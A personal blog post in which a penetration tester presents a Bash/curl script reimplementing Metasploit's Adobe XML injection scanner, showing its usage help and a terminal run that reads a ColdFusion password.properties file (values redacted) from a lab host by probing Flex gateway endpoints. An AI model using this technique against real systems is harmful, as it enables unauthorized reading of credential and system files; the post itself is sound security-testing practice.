Today I spent a few hours learning how to manually perform the actions that one would otherwise do with Metasploit's "auxiliary:scanner:adobe_xml_inject".
I built a standalone Bash script that uses Curl to submit the XML file to the vulnerable Adobe service(s), so the desired files can be read. Basically, it’s the Bash implementation of Exploit-DB’s multiple/dos/11529.txt (which is a PoC / paper).
I've submitted this script to Offensive Security and I hope they'll consider adding it to their collection! The script is currently available from my GitHub repository -> adobe_xml_inject.sh
I'm darn happy with how the script turned out! I couldn't have made it this quickly without the valuable experience I've built at $PREVCLIENT, using Curl to work with the Nexpose and PingFederate APIs.
Here's a little show of what the script does!
root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -? adobe_xml_inject.sh [-?] [-d] [-s] [-b] -h host [-p port] [-f file] -? Show this help message. -d Debug mode, outputs more kruft on stdout. -s Use SSL / HTTPS, instead of HTTP. -b Break on the first valid answer found. -h Target host -p Target port, defaults to 8400. -f Full path to file to grab, defaults to /etc/passwd. This script exploits a known vulnerability in a set of Adobe applications. Using one of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is normally inaccessible. NOTE: Windows paths use \, so be sure to properly escape them when using -f! For example: adobe_xml_inject.sh -h 192.168.1.20 -f c:\\coldfusion8\\lib\\password.properties adobe_xml_inject.sh -h 192.168.1.20 -f 'c:\coldfusion8\lib\password.properties' This script relies on CURL, so please have it in your PATH. root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -h 192.168.10.23 -p 80 -f 'c:\coldfusion8\lib\password.properties' INFO 200 for http://192.168.10.23:80/flex2gateway/ INFO 200 for http://192.168.10.23:80/flex2gateway/http Read from http://192.168.10.23:80/flex2gateway/http: <?xml version="1.0" encoding="utf-8"?> <amfx ver="3"><header name="AppendToGatewayUrl"><string>;jsessionid=f030d168c640a7d02d4036a3d3b7e4c35783</string></header> <body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits> <string>timestamp</string><string>headers</string><string>body</string> <string>correlationId</string><string>messageId</string><string>timeToLive</string> <string>clientId</string><string>destination</string></traits> <double>1.491574892476E12</double><object><traits><string>DSId</string> </traits><string>DCB6C381-FC19-7475-FC8F-9620278E2A14</string></object><null/> <string>#Fri Sep 23 18:27:15 PDT 2011 rdspassword=< redacted > password=< redacted > encrypted=true </string><string>DCB6C381-FC3E-1604-E33B-88C663AAA33F</string> <double>0.0</double><string>DCB6C381-FC2E-68D8-986E-BD28CQEDABD7</string> <null/></object></body></amfx>"200" INFO 500 for http://192.168.10.23:80/flex2gateway/httpsecure INFO 200 for http://192.168.10.23:80/flex2gateway/cfamfpolling INFO 500 for http://192.168.10.23:80/flex2gateway/amf INFO 500 for http://192.168.10.23:80/flex2gateway/amfpolling INFO 404 for http://192.168.10.23:80/messagebroker/http INFO 404 for http://192.168.10.23:80/messagebroker/httpsecure INFO 404 for http://192.168.10.23:80/blazeds/messagebroker/http INFO 404 for http://192.168.10.23:80/blazeds/messagebroker/httpsecure INFO 404 for http://192.168.10.23:80/samples/messagebroker/http INFO 404 for http://192.168.10.23:80/samples/messagebroker/httpsecure INFO 404 for http://192.168.10.23:80/lcds/messagebroker/http INFO 404 for http://192.168.10.23:80/lcds/messagebroker/httpsecure INFO 404 for http://192.168.10.23:80/lcds-samples/messagebroker/http INFO 404 for http://192.168.10.23:80/lcds-samples/messagebroker/httpsecure
View or add comments (curr. 0)
All content, with exception of "borrowed" blogpost images, or unless otherwise indicated, is copyright of Thomas Sluyter. The character Kilala the cat-demon is copyright of Rumiko Takahashi and used here without permission.